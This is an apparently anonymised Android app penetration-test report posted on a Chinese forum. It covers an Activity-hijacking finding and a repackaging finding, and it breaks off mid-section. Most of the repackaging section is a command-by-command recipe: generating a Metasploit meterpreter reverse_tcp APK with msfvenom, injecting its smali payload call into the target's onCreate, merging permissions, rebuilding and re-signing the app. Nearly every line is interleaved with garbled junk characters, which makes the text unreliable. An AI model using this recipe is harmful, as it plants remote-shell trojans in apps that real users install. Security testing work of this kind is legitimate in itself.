原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

7 H* R, r6 M: _9 C& _ 5 {3 e7 F5 j) l7 N: `' t
6 |% M% {2 `2 O2 l7 ^$ Y- c! M / [. Y) q" v' o/ r% p% t( ?, O6 E

0 b ]) o. b# g3 c( a0 E/ \: t, n) U! G( l6 h P/ T' k 文档编号： 6 Z9 `2 |* D, o# U2 X7 d }# d & V% i, O- x0 L5 m- ~/ \8 b+ L1 `6 Q

7 y+ \0 K+ Z* y. w7 l. Q , A; G. H" ^5 Y2 v1 s+ f. H 7 u7 l: }$ V2 q1 h0 C0 I7 E 7 Y- p# X8 A0 A! W. e m

# p: g5 B5 c7 D: @ S9 N9 t 2 Z* l1 _- D0 H P9 S4 G5 Y" @7 p3 I: H. D$ t1 j 5 z- c, b8 `, Q( ?" w

0 K2 J2 p& V) b1 T) ~ * U! ^$ N, j8 }( `8 t3 b) ] 5 n1 ^7 E, p! k; [0 G! I 1 o2 M9 H7 t) \, a" j6 J

! Y- ]. e8 U/ p$ A 5 @" I0 F. x% k8 i ! x: L, w& J7 k! O5 H/ r8 U 5 Z' z. ~) {; M& o4 P

3 \1 `: ~) ^5 e8 r% t! e( B/ {8 u! X G0 {1 V, m * A) }+ C! n& u0 o , g* |' t% k& K( e# _2 t8 |. P' H

7 L/ P) K8 }+ C$ B. ~0 U% M0 K6 R2 V2 G' W3 N 某某某APP渗透测试 9 W) Z/ `& P2 E2 M+ C7 M. L% m5 d1 m/ U8 {8 M

6 f3 r; k$ [/ d5 Q0 E7 ? 4 N% f% c( J2 r9 G" E, X) C 9 Z! i: y$ g6 Q3 X' ~& Q % U$ }% O7 R* ^3 E& l

% R. L2 U& S( [# t " @. a! x6 d% m) w$ S5 S& J 5 ^; D# Z- S) }9 `4 P3 ] 5 l/ N3 V$ G/ N4 `

* W9 \: s L2 n# B& ~ # d* h( H U8 q7 d' X: e9 F4 u, { ; l- G: t7 r X' {( I. } 3 }' V' X% b5 Q& X

+ V7 O7 N# o+ T0 ?1 ~* w# V. n 0 @/ W% Z) i: J, z c6 F $ s5 N E Y9 G " V2 P4 T2 H% @3 H" o9 R* o, Q

- }- @( f1 t3 k3 g* u4 X4 y1 V+ e- R' Z, t8 P- s: w 技术报告 # `# p1 g( j) R" v* n , J, j# e- i4 N3 w: s

a$ n% Q6 z$ {8 g % ^; ?& g# H1 ?8 h9 j$ j 3 s* @2 V2 T+ \7 J) \8 e 0 o- \+ ^9 n2 K8 j

1 t9 U R2 s! l- Z9 q - i! b* ]1 z( S8 s$ N 3 j9 e1 z/ \6 e9 ~3 O- q# Y' _& B2 T$ v% x* [7 W5 A

$ k* S! ?0 A6 P# G, T$ m7 [ 9 o6 S9 Z" U9 K, b* k. Y 3 h4 a+ F: a% r- F: r3 n6 H3 C. V" L& E* R9 o, B

. b7 ]4 ^) l/ |) C5 b/ _) w" |3 o 5 B+ r4 Y C3 W 8 A: @1 h+ O. |* r# K. n% C) F2 n d% r. {$ `

( Z3 K. |, E; r0 F! `1 C5 n/ x" k 0 U7 W0 ~7 P% m+ x' J 7 ?1 N: W5 z7 Y6 i# }" Y/ E( e3 p

* g( i n4 m# G* }; J5 P" v' l7 j3 P4 r+ y+ {/ n 3 [- w/ ?" u8 U 4 J0 y6 r8 p j& o

' q# a! j5 U9 j/ B ! J9 O* T/ K2 O- y$ E8 V7 L m- N( ]1 D/ V! B8 ^& D, M9 f# H! V; h% v

/ a& S* k5 v' f0 o5 L1 E 1 ^: b# b$ R7 m* F) {; M* }" b2 T + c7 i5 ~" l- V" v \ ( a: f1 t0 X' w3 F3 M: f/ O) V

/ ^" b- p) P6 `4 X i & x- \$ h" n! M, S0 h# V7 ? 8 e. r$ L$ t3 I1 W D. G: A0 O+ Q / U# E9 Y/ X' {( }. N0 X

: M" W; g4 n2 Z2 G5 F u, e ; Q1 D/ k F- Y* X " r, v! a9 q$ @, \/ L: m# r0 z; F E! G* p( d( U" g

L7 F% y9 k$ V8 q ) j, A0 T& t4 x) g 6 G$ f6 p! c& _( `- ]: u 7 [6 f0 ?3 ?& c

# E0 }4 I( x5 l/ I; T4 ?* D4 v2 }$ u3 H d2 m; ~' j3 K; Y0 m2 S 7 q) X% x+ t) u8 t* I' a

* M0 o* i8 ^4 ]" j& @9 b , `& o- [4 D: y& ^! i 7 C9 a7 S) B! s: O & h' q) [) W% L0 H2 l; y8 z Y. \

$ z- N2 e* Y% B5 `9 L $ [* ?5 O5 t0 x/ A% V1 J6 n ( k# ]! m) a% K6 S1 L! _% ]8 \ ) v( ^1 c+ S( A; `

- @7 s/ x5 k$ _' _* D+ b# u: j: n" u 0 ^+ W p- b. O- f' P; ^3 } ( Q; l, r' c2 f1 f+ T* s. T* m

# ^& I& Z$ c( w4 M 5 Z N7 R1 O9 L) O% G + P; B1 R2 |9 J: p0 l9 F : I# K8 B" p5 g: M0 c z% f

) e, n4 e: N2 [% J* D3 a) R b3 Z. D9 T: W * U6 a% h- `# d; j' i. `7 n. `9 S1 \# s. \) N

" `/ U# |7 X1 r - ]: p& y. W& r: A' \7 } 3 h/ Z/ R( Y& I7 k9 T% Q) R7 j% ~

+ Z+ X3 W( e1 g" _! U) Z 3 y1 q4 f1 o; V! O6 Y' V 二〇二〇年 ' \4 s9 `5 \2 ^# ] Z4 R1 v! }6 y6 A$ x6 F: Q

0 w+ i, z% L- { % D2 x, h8 i8 }* l3 I) E 目录 ) G" D+ T7 i' m* c 5 T4 r8 Z% f- p5 x1 k: b$ J* K# y

2 N+ i; c0 @: [/ L6 M2 b 5 r+ j# h9 x }! ` S# f 6 b& a" O! Q0 D" X4 O# M# I( d ]: k$ K. M" b6 o) t o

+ r: z- T$ a. l) d+ W. E+ n/ k. F- x, q9 A2 K0 M 1 概述... 3 & h' D# h- |( k I3 U# ^" e* A7 [8 h# }$ f

( m7 d+ n2 ]. J9 o8 t2 D; r6 w Y- [3 P+ P T# q8 k 1.2测试时间... 3 ) J% |# L3 R& c4 Y4 x 6 S% }. C" v+ P+ @5 M+ v

$ a* {3 O( z! P7 b! s5 A% G; O/ ]. r4 @ B- T/ ?# T7 F 1.3测试对象... 3 - V$ _0 P0 z B) g1 p& R8 x8 [ * f) C5 K& d4 \$ ~& b7 X7 X: Q6 O

8 Z$ P8 o0 O. H0 m' y 6 e9 z b& v9 |2 m2 I9 |* {' j 1.4测试结果... 3 , o: Q; Z9 f/ C7 ^. n/ i$ O 8 N- Y: F* j2 X5 s7 L6 }

% _% U8 Q% A8 g W5 `/ v/ U & A. L' h. c V 2 检测结果... 4 ; U7 ?- _3 J8 n1 R6 X: h2 W3 B 6 g# X/ w$ h8 t; A( |; Z) A# c

0 b( d5 H& P0 z4 Y' ? * _6 ~" b6 P/ u2 O5 G' G1 h3 g 2.1 某某某... 4 r$ ]0 K, ^$ ^8 ^8 b1 M9 W1 ` ' `( D' O$ Q! q, Q3 u* b

0 J9 `; a6 i p# m6 ~ . v4 h" g- C3 U7 s6 R. ]! q8 U: {" Z 2.1.1检测目标... 4 " e0 E# R$ U% Q& ~) z+ S3 I, q 5 `/ y( f$ e5 j8 u0 g8 [, J

" l' u3 P: [+ \; [: D2 D2 _& z; [; w: {! o! r) J9 u 2.1.2检测结果... 4 4 ?# a# q$ l& o C: x& t- K + e- Y2 g. X( Q7 m6 i5 i' H

1 g: E3 o1 s+ |6 [" `0 p * q' E- ~# M/ ~& X 2.1.2.1. 4 1 s! ]+ j, T) r) I1 i, E" X" u+ ]" V+ T: A* R( d1 Z0 l

' J1 O# w' t. N# t J3 k" S# I, }0 V* y+ t 2.1.2.2. 6 + g3 B7 Y) v1 @; G( a) i8 S, `; N2 k1 a

! u( w0 T' k! a: J! G6 ^ ! ?" D" N5 L. z / d$ h Y: x) s0 \ | " o2 O' [. k4 `+ Z

3 p9 l: a8 e, ]2 s. Q! x1 o8 e 3 I+ |" `0 O, v" l 1 概述 6 \, b4 V+ {4 @& |7 ` ' O9 h+ g8 X$ X8 V1 q% c1 v3 z

& _# G8 M3 N, [0 x - U" q: C2 ?4 f; f) C5 W S 1.2测试时间 ; G/ ^- h0 M0 y% l " m1 m, R. P% d/ C- ?6 a" C

( U( A3 z5 q: P$ \|/ \|+ x & K3 n1 T: t8 H" O2 ?% c% Y1 L & L$ A% U \( p* g 1 x5 v I0 v3 ?3 ]/ ~# g5 { 渗透测试时间 / z7 t8 r+ }7 f1 M1 {/ e. f: v 7 W \% t/ w5 J+ ~, S 0 M t6 X8 f) d; B& q * J6 T' {, w# Q+ a5 t% _- f' ]
$ j' ]6 f5 ~$ _. h * x% z) {' w3 w/ j) K 0 I7 m2 r# A/ l& E 5 T# r' n: M# N ?. f, l1 h 起始时间 4 z! m* o# J: P T' ^0 Q * n+ u( f, D6 Q U& d1 F5 Q7 n+ ` $ s* o6 X4 ~; v 0 s8 y2 N1 F1 h2 g+ s	8 i, q) g! i% a0 W1 b d) ]1 b+ f% v$ W! L! O" C0 S, h2 ?7 P m ( ^2 p/ l8 e/ N% L# X* Y( u ) f, Y; p* j. s6 U( c8 @$ ]) ^- u 2020年4月6日 9 p3 y6 H8 f8 p, U4 c+ [ 5 s1 ?( g8 z: y! A$ G 1 w: X9 y0 w% N9 D C- L* \| 6 b( ]. P6 e/ \|
0 l ^- R0 Z; ^7 G8 [2 X" L7 v- S1 W# m" @7 Z: S$ ^& q* ^ + B" Z0 M, z0 r3 A2 s5 \ . o) g6 o) {% @6 e" i 结束时间 * `9 R! z/ w- j I; x# ?5 p! H8 f) x % i( Y( L1 r6 B$ A5 D" o. L) [! `( \: b3 Y! _( g0 }% `	! \|9 d/ o) _5 P3 w/ \|1 q ) }8 G* [" r* D( i- g9 i ] ( ^$ ?2 e( j- \# B% U 6 q% G! W* }2 `" G4 V; k1 A 2020年4月9日 ' U% T/ Z1 R& [- p4 v% i 0 t" p! s' R/ y5 M% ` / M0 G: j, e; A' \|; ~ 9 B6 e4 q# K) p

. D. f2 e {9 A r2 v) A$ n) k% M9 f) `. B p- [# q B9 B 1.3测试对象 & k O: u/ {+ _' N B6 P$ w7 ~" g4 Y. N

8 a6 i8 Z v; {' M, n) Z Q $ N6 [# s) y; h/ w, ?3 ` 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ) C% q/ L# r% O 9 `5 A1 e% s4 w& ` y8 ^5 e) i, y

% h" ?0 d$ O5 _4 _! b. f6 F ' O4 Y3 n7 j/ z0 i+ \( E) Z 表1-1 检测对象 / r9 L/ P( \8 {1 X. k h9 P0 }5 R- c" [- ~, `4 N

9 t& P: H4 g* m' W & h/ X. j# e" M ]0 G) z; j 8 k- w- Q# F/ ?, h * c' G; X9 K: p: K8 I9 b 序号 ' P, a9 ^4 i: ^: L+ u4 ` \|/ ~7 Q {$ x3 w4 B9 [) M * q6 x) z! J) K {/ j3 a 0 z2 u2 f- F: L r& s, ?5 Z	. p* V: n8 x* f* v3 \" v/ W& y3 b# [% w # R& ?7 Q, _9 `3 P" f& K+ i 3 t) m3 C' A/ K2 {. Y i9 q2 Q6 G 测试对象 - t9 Q! V$ G8 _7 K1 E. r6 A+ U ; Z. l. G+ `. i2 N" z4 ~) l( b / \2 z+ v/ I. c3 t6 l& n5 V5 u% Z ; R3 x& B" D0 L	( t0 \" A7 ?" D( w: y6 r( _$ Y - _, O3 @* N3 ]5 P* C, P * `$ ^- r- r J 0 o- D8 T! X4 i2 ` 测试地址 9 e. Y. G0 t1 J2 J5 w " @# X ?( {. r! p8 u " o0 Q- Q8 \|9 f# `/ z 8 L# ~& r9 p* Q	6 z* l/ _1 v/ y) o" l: A1 J2 a% L; c4 e . Z5 H: A+ C, V* ~4 d& W- v ; O- z" \) j. t; V4 D% f 8 T5 R( F3 w3 r 安全漏洞 5 P5 k1 c- ~0 T7 f* _2 ?: o, Y 4 L, k1 G: W! [ ! T5 I5 c/ A' d+ H. M1 e: g2 i2 e ) M$ B! Q4 G, p: _3 C
4 u; z% y# ]; x: g 7 m" f" s: q* I( y Y+ r4 \3 H ; {4 f; s/ ~0 U9 @, m8 `" _2 F3 V2 W3 ?4 v) J8 o8 D 1 0 g4 t7 [, S% ]4 `' N% Q( f2 D& J- [+ } ) r4 z+ i" t1 W6 f1 H : {7 N2 i, V" P* p- g	- F3 N2 p! W+ D: L8 \3 W% b3 Q) o+ \: T' {, R/ f7 L 7 U' p! _' U5 X# Z: H3 B) I2 d ! K" [1 T) J# S6 ?: v 某某某安卓APP 3 w; U- d3 K0 ~3 Z ( ]5 r6 w& ?6 ~. s' _ ! D3 V6 W9 G9 q+ i6 }. r 4 l& Q! T# f- Z7 t! J	# f1 X7 R7 j$ S$ W& B: Y % G, T; Q: E# }% _3 j 5 r: V. J; \5 r$ ~# M1 Q* I8 D6 ] ! f$ c0 y1 r; ]' X9 } 3 [7 s2 C5 d" S9 E( p; K ' q) ^; M1 G# X [+ U7 l 2 X# m, C# _1 f2 Z- j/ Q7 @/ d, M$ e& Z1 C' ?8 @) `* \|# E- F	. H. P- V( Y6 w0 l( ^ 0 Z2 H7 d1 n) _9 `9 r 1 G5 o( C+ `/ h% Y* j: R0 a" c* k( o" [ : }% n/ `4 M* ]; {+ v5 X3 h 2 # z8 u+ W2 q) e( u& Q, A# a7 X, l' G% I& r! G" t5 t# t( c4 Y 6 i) I2 O% `. ?8 x; s6 e' c! O $ z% X$ i3 A& _1 t" D

, k8 _. Y" q5 I2 O# [/ v w& K" }0 m5 } l% q+ a* F 1.4测试结果 0 K: T/ W0 y3 T& j: t , M8 d% m# U8 X# \5 c

: w0 C6 L7 d/ _& Z) C; y8 a5 `9 v; B- x6 o: A7 I9 q 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： - Z9 ~& A; y6 q6 K- E7 }$ V . t4 @0 A9 g$ I t* O# F _- h; v

+ j( i0 {/ y. A" l( E + V# Z5 m( m* A; D8 ~" F( P $ g, H. L/ L7 t! X% x' ?$ n- h$ | $ y) U0 k7 i% E. ^' Z

& c. R; `$ [* B0 N& O, Z7 [ 6 H0 g1 a0 I: N1 j& T! \ 序号 ! K# I9 X$ ~" B0 R5 q" } 7 t+ X$ Y4 b4 Y: F8 B9 j

: ]6 j2 F3 \# C 7 P+ z, _' s; M8 D% ~% n 系统名称 : X4 g o/ @: G& b7 k : P% t, ]/ ?' R6 T/ s

$ `3 y$ L- ] D & O8 @5 \: w" t 漏洞名称 , Z: j: D" E) ]: e8 `9 T* v ' X7 f: Q# h% h, L

" p' J2 y! d5 G% { " M6 u q5 Y _% r 漏洞危害 5 ?. B" y7 `6 S0 \9 l& ]: Q # ?0 h0 `4 Z1 {9 U& H- t% f

: K; l4 Z7 h" }" Q, A 4 `8 m, ^" O6 v5 { 修复结果 6 m' L6 U! @5 A- c% a9 D: _ n5 k+ x, j* `; k9 n% [

0 K5 d9 y, J% o6 t) v1 T - [2 R& n/ d2 V' k 1 % L' E$ B! J; {" I2 f ; F4 f( l! j+ x0 T1 r7 l

9 p% ^& X8 A) A% a/ p ; G# ?# D( [2 ~7 L4 N 某某某某某某APP ) V4 x$ }( d9 l( t" R, u : H: j. ~5 L1 K$ }7 U8 u

9 `5 r0 R7 ^- j; `5 \- l- G' ` ( X% Y* k' }4 D Activity 劫持 - L" v0 S/ r& |" } 1 {! Q& u, g( n3 T, U6 Y8 A

, O- ~( l5 ?' _ 1 L8 \& D% u; B 6 l0 R- i% y1 n" v3 b, Y 3 b) l# Z3 V% d0 T% i% U

1 x. c6 F5 `0 R3 G9 v U# `4 v2 \) g) L 高 " ]; I" C2 ~+ D5 A9 Z . \1 _" \# R# _5 E6 Z" V; K2 n

4 T) W7 E: v: q/ Q) i $ j( L' X" t7 H& R: V3 T 2 _5 o$ n: }9 @. {4 P 0 r5 \6 i8 ~+ d4 f' F

) f5 s$ O0 g. P/ K! C; G1 _4 E* m# @! G3 B: ?$ d8 R, {, Y [ 2 # N/ C# n" F0 O! i3 x1 V9 O6 V: d2 T$ e1 U& d9 S9 \

& ^! k- P: T) |! _5 l) N% T) I3 X " Y: M' d* t T9 ~+ q 某某某某某某APP ! G6 H/ g+ M3 [* s' ^" O, A) ? : X& m) K# N* M, ]! j

6 \7 L; j- L+ k+ w5 Z9 w; ?1 ~ ( f3 \5 L: Z% F 反编译二次打包捆绑木马、篡改APP代码 1 Y: z3 S( L: T) W1 m3 b 3 o( a, ?6 Z/ h2 N# _( o5 j

: S9 y: k9 f% |4 o( o % s( L( X6 m7 n# M7 O 高 8 M8 |* p+ f, [9 |0 W% A( f) Q d5 a* ^" s9 A) z+ _

1 `5 }. |/ Y( g7 q1 i1 \5 I2 L ' g' N1 S/ V: N 5 J1 r+ M# y' j7 P' U 7 Y: N( n) _0 Z

# h7 |8 V; @& X) V1 o . [: p/ F" w3 w' z4 H8 a, ` 3 G, ]( }- b9 @) @ : g. T2 Q& A9 t3 z) \

* h5 u9 F0 X4 ^ # |/ z) D/ }" Z, `3 L 表1-2 测试结果 / z4 {2 t2 U" T3 J# q 0 [7 ~9 z# o: v* J' W2 ?1 Y4 v

6 `8 O: P. Y$ ]" j: l" ? 4 ^7 k& q, E: ^7 i5 Q& J3 M : w, ?: U. f7 g& P. j+ }- s- q+ r 7 m/ @ R! k8 B( _0 D! x

8 _9 `3 b. O! z ( N C) L5 y( V3 [7 W 2 检测结果 5 T% T( G" r" H( S; c ) g4 F, g+ w; c" ^; V: y) C

5 \" z9 d# L* t* R 5 F% i1 j0 ~0 }) `) g" e 2.1 某某某 & i" J& a! h% e* u. I/ t* G" p ! K( o u% s0 _: X9 w0 g: s

' ?0 I% ?, J0 t z3 v R# t4 e4 |/ j5 [& K 2.1.1检测目标 6 D f/ y/ R6 l |! t% v l 0 b! q+ V m6 r' ~( w6 t/ O, I

. z& F0 z E5 T6 c ( g l5 y" Z' P& _ 目标地址： 某某某某某某APP . R5 h2 J5 Q u- c6 w 1 c0 k6 _6 U3 o; e- I3 e4 O

' P$ y+ N! y7 h& Y4 N: P1 t6 ]) u8 l ; k3 c8 i8 b; Q. {! C+ ~ 2.1.2检测结果 ( g6 z# e- d3 @1 q4 k+ P( b 9 ^0 X; C, A4 B. i

. _: Z& F: f, }: r # L# O. o; J! `( V* p, g0 ? 2.1.2.1 $ y1 V* y0 x! z D% \ , m% [. d+ g" c4 m7 _: c

. V5 r5 d, ^$ \ S, h9 g 8 m. d* [6 X6 p0 L 漏洞链接地址：某某某某某某APP $ z* d3 t) c9 b" h3 Y+ M5 d" Q Z6 A$ d) G* F( k- s

2 J& U0 L$ [. O( k7 P5 q# v: C! d: N 8 Z0 B O+ q4 O6 J 5 N$ j3 A/ F, x# c2 d/ g+ ]7 U7 U9 l: c% E8 a' \& l) V4 h

% X; O5 M# @) o6 N8 m# v4 Q& ^ 1 N: ?# I0 _* ], ] 漏洞分析及取证： / Y& w& l+ o3 a: t. O" _ % H' L0 Q) s1 H

! R: Y0 Q3 z% R8 {1 }& ^4 f [) \1 Z5 k 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 0 z5 ^4 ?6 }7 Q D3 E7 s % B) @) f6 j3 M, k [9 Z" @2 s

) G* M" O" P4 s' ?' Z + }( y$ P z: F |% t9 ~+ Z 5 t" O7 I, J# y% H / u7 ?7 l3 t, S7 @ i

7 A8 W/ B& X) |' d0 A& u" r2 J 4 f* I9 w. O. [# U+ r& I 6 Q0 W! u, y5 Q, F) p$ s( U1 K- u! r. D# Z: i

& Z& s* N. ]) I; P: c) e* F; v$ x- t7 d- B 1 C/ [1 [( o" [* K$ X, @" @$ I $ w, \ _- D9 k0 i- f! _# G+ k

* c- D/ V4 ]% }& j4 i# u ' N/ G' u, y9 V% J6 U0 F$ Z/ F # U2 w/ _* w5 G2 Y; Q- I& }: Z5 j0 i3 q+ K

, A) v3 B* L. z/ c% K# ?2 I# D4 u- x! o5 \3 C# A4 ]/ Q9 y * r8 n: L; N6 u7 f 1 h" Q& |5 H$ N k

+ n( Y' F3 B4 B8 K; g, Y, I & `2 _( x; Z; _5 N! r3 _8 N 漏洞危害：高 % M6 u, `; d7 Z8 M- m1 j3 D * ^. I3 b3 J6 V9 u4 B$ l; D6 b

h2 F# ?2 T7 T- W& \|" t 7 ^5 \|8 L1 F% e9 ? 8 n" s& \|- v5 N2 k# k ( O# j+ m0 l: b1 }( D/ U N 严重程度 2 f- B! X/ C/ D+ Q+ X. } 6 s1 x6 n5 \|% ]( N) p ! P" L, D1 @6 @( H4 \|+ F& A " B9 X5 V/ R( k8 j3 H" F	! \4 ^, F; j3 W5 O2 W8 d6 d; s a 6 G: t+ b0 B# [( J+ Y 9 [) ~2 L0 `! h* u6 c# [3 c. H. S8 K5 A 高 ! V% g- b+ }( ?. B- h% H8 n" w! i9 ^( [4 {4 y . m `6 c& U, h, W3 V! R+ x9 S) A5 M1 f; t" D7 W% i	/ [( M" J/ M# T+ p+ [* o2 t) }4 I+ u# D 4 `3 `4 r: q6 T0 x ) b. J, A5 Q1 M ■ ! {: O# K; g6 H( M0 d: D @ : ~- d* n: ~& N& W* v9 l ) F }# i6 T8 q' N& X0 U s) Q2 e y3 k# V' U) b+ ^	9 F) X+ C; i; s8 q. q / p0 I$ }& o: v4 h1 p& f) C5 E Z3 n1 F : M; H& X2 q u" g( W% G + h* c9 d! z* ] 中 % e# U3 g! n( Y! \9 ^8 Y # D R0 i* U+ M* [( r : r6 R4 q) R5 l8 X# w3 G * K, e, M. ]* x	, ?$ J8 R5 Z6 @$ r+ c + s! A3 R z" _+ M" ^$ ^" U " M, K- r3 M) _$ R) u 2 B( t: K- v' z" X) L) A- i8 h; s ! `, n5 v! G8 \ % H( u3 {: L) Q! e" ~- h! \|& r 8 X* ?- N: N; N, d9 K+ x3 ^8 r0 e( V	. g2 o; [( \$ Q! e; o) p ( \; J, ~* D$ X/ V1 g$ F3 v 2 M( U2 Y# H$ f 3 S7 w% E! F, d; O! E% q 低 6 Y& q( ]' i' j2 ~: W5 _ * j4 {- H9 m# @ m5 N4 I- q + j6 a# I) a, H; h' d. P% v! a6 K: Z2 R: w9 b	$ G7 e: ?* y; P% h ! D8 {/ N- ?7 P; n5 [, i8 b& Z( y 6 c J4 R3 ]; V ! e. \% X! l' Y 1 x$ s8 [# h6 U5 ~3 \, R % A, W; c# b* H0 W* v/ x 4 \|$ M& G0 f2 Z3 Z' [) W 3 o. V, Y* C; T

2 i- \- z9 v9 H( E. d5 @ ) A/ r& \) H+ K! k; B % I( m2 R+ ^: t( x & W0 z a2 ~/ C& V4 G1 {8 f, C

8 @( z+ C4 g$ s- B. i4 J6 p1 |: {2 j % w8 A1 Y# S" r3 z6 v 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 ( v8 B; U# l: p3 q 5 n B- h* ^) Z1 h3 m

) W0 c; ]$ v# [: D% z9 _ 1 o7 q8 N' U+ ?/ m7 [ ( D% `3 V8 X# q6 T' T . c! y0 {4 c5 [: K

! R0 T1 z( ~- R+ L+ q T6 S ) _4 s3 S @& k' | + G& o0 ~0 B3 p- q6 L4 @1 N% ~0 Q& w : O3 J6 A5 [" K. p7 b2 E1 B

6 h* Z: l$ p8 x& u+ P. Q+ W' N# g) Q6 f: \ 2.1.2.2 4 P D B* S1 y" |3 o # L0 X# {3 g. u! g* p5 H

5 G' H( D( T, a8 H, w, T 8 Q0 B% _# C, B( M8 H 漏洞链接地址：某某某某某某APP ! W4 _2 I- q% F5 ]; b4 M4 l% {; }& H; [4 Q) O/ `1 |2 [. j2 x

7 b* k/ D, U% V2 |5 F& l3 l. f/ d& o6 d# M 漏洞分析及取证： F1 w; S3 p5 @" H+ { ) [6 F2 w8 s R, h0 y1 V$ b) t

+ U& h5 S# S T: e& r# N& A: @8 g 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： - e; _# f$ m1 q, q, J' I3 X/ Y7 O7 p( ~. ]

& S8 b. F% y" X9 E. K/ f 0 K$ q* B+ [- `7 {+ V 用Metasploit 生成木马 apk 2 `- Q& y/ s( J0 t. ~2 s: [+ U A! b1 p/ N1 [& j* m

! G+ o- e, K" p2 |& a8 F! B) y* T. f v, r' A msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk " M$ T" R8 `1 ?' |5 U6 s' x6 ~3 @! Z$ k. A+ |3 _3 E8 f) t- |

" i+ p, m$ o |6 x0 f : M4 y7 W( ?9 |. s* W# f4 e. E 反编译目标apk和木马apk & ~: |- f2 G& }8 M8 f/ @ # I0 Y9 ]" q, \( A3 \& Y

$ \$ X" N7 [8 C1 x* P4 \ 1 V- S/ H" e- t7 t* Q apktool d target.apk
" P3 g; G4 k& Q+ d3 } & t* s$ t; U6 {5 y4 P apktool d cockhorse.apk ) c9 m+ M; r, N' o 5 |0 X$ Z" [7 q( N! {

3 ]- q$ y' D& G; q( c' K5 ~ % s: P+ u: d2 l# ` 木马 apk 注入目标 apk $ X, P4 K) v. E+ u3 d 6 K' u# x; m) t7 u% S

9 D! o) @/ D, E8 O* [6 c / \# ~1 ^, R/ w+ K ]5 Z# J 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
& x" E: Q; Z" i- d+ J2 n4 x& {5 j7 D d& p1 I0 f6 L- Q2 I invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V + K F- k( F& d2 H* ?0 H2 ^4 j# {5 I4 h5 i2 r

9 F4 M9 C2 J, ]% o! i : v: A! H" p( A/ u2 P+ [ 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 1 J/ g" M% \: y+ x& i5 p3 q7 @7 ~! M. V; B

8 W' E- g, ]' Q1 O- g2 V ) {) J" S/ Y" k% f' B8 L 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 / z) B1 k( w* c+ `4 _ 7 k. t5 \9 n% a) M8 p# N, a

( @- N# x. [. i 6 Z5 I6 o7 ~# W 回编译生成最终 apk . j! t2 I M) r% H8 h: |; }! A( [* x+ P+ R) z" f. @& x! g

( F6 e, G4 c8 G* Y ) ]9 @! B; M0 _+ B0 ~ 重新打包 0 N2 I" J6 J" x ' n; G- a7 Q( u2 O2 C6 j

1 Y3 a, X: Z# F3 g3 X j$ d 3 I% ~1 C2 ~, B, ]8 y: W apktool b -o repackage.apk target_app_floder 7 u* Z. m2 q* n# F1 H 8 W9 H: \* T( \

7 g$ o+ b$ B O+ F, a9 Q' d * O' {5 b4 F6 I# Y8 R# o% y 创建签名文件，有的话可忽略此步骤 0 o9 T% G9 j. p" S% o 1 [; Q, n& d# B2 K8 ?

1 B9 e" |, a# `' H4 T- ?# a # B K; G1 A0 d- f8 Q keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ; n3 y1 E. \, m7 \" m- i , E7 r5 h( C1 r/ `) T

+ w( D2 e* u# o+ l # C4 R/ c/ S5 r( S( ` 签名，以下任选其一 % Z9 D* H/ Z( H. V 7 `" c' H0 e+ {* C7 D0 S/ w* m2 _1 s

) g) [8 }5 e: e9 v ! Y# o; |- f6 x7 q% s" K. A jarsigner 方式 0 ]' i+ V# \, T! m' \8 T 7 d9 }" W& K. k! f; A

. D9 s0 ~7 ]; _0 i ' Q& q; c$ z% r6 g, r" P: X# D jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname H- E' P5 l$ S9 N " E: m1 P+ _& L

( j" O/ `) v f$ m/ [9 v8 w/ v, \( U' {# k apksigner 方式 6 ?0 y$ @: l" w5 p0 b" B1 J . p r! P: G, o; X9 _5 j5 Q

. q4 N9 d8 J: Q9 d+ K5 j0 g/ W3 |1 _. _ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk / n+ x$ f( k. b& j ( Y, D1 K- x* p" c$ A2 [' W7 }' h

8 e9 a/ V9 l9 B ' k c2 F: k7 Z+ A4 l' H/ C2 h 如需要禁用 v2签名 添加选项--v2-signing-enabled false 6 c/ d! K0 S1 v( D5 b - V; P/ R1 k# q

M& E! n" C% A; `! C/ b* o4 v1 W, |. A% e. ]6 Y0 {: E+ W 验证，以下任选其一 - k% J* I3 p9 H( _8 x * \: ^8 d1 F3 Q9 m! Q1 A' J

- D S, O; T [" ^ + B7 l; H# z; E N& M8 u1 [6 p& N0 F jarsigner方式 , G% U8 d- g" \; ?/ }0 Q + w1 F. o) O+ i) D$ a

( ?9 ^/ [. }( h6 e 1 R) v6 H$ R# |. ]/ K2 R1 @6 { jarsigner -verify repackaged.apk , L2 F2 a- j$ [4 R9 K T% h9 f $ g2 D: d, u: x5 v5 c

* x2 K5 ?( M+ H+ I* @* ~- ~' N$ @ 6 r4 j7 N8 u- S" z, Z$ \ apksigner 方式 }; A1 O6 c' V3 a7 D$ v, I - B& h( m* i0 V

_6 H# B' N5 N 8 J4 Q, u' o2 s& t apksigner verify -v --print-certs repackaged.apk . o& {0 b5 ?& m$ x$ M( W- {# C2 X

( R$ `6 S2 @; v% C- s) j6 c, S " _# s; Z! }5 @& [* l1 L* m8 k keytool方式 . n5 y# }9 r/ z& b* s v# O # ]' J0 D2 d4 |. f6 Q% q8 z

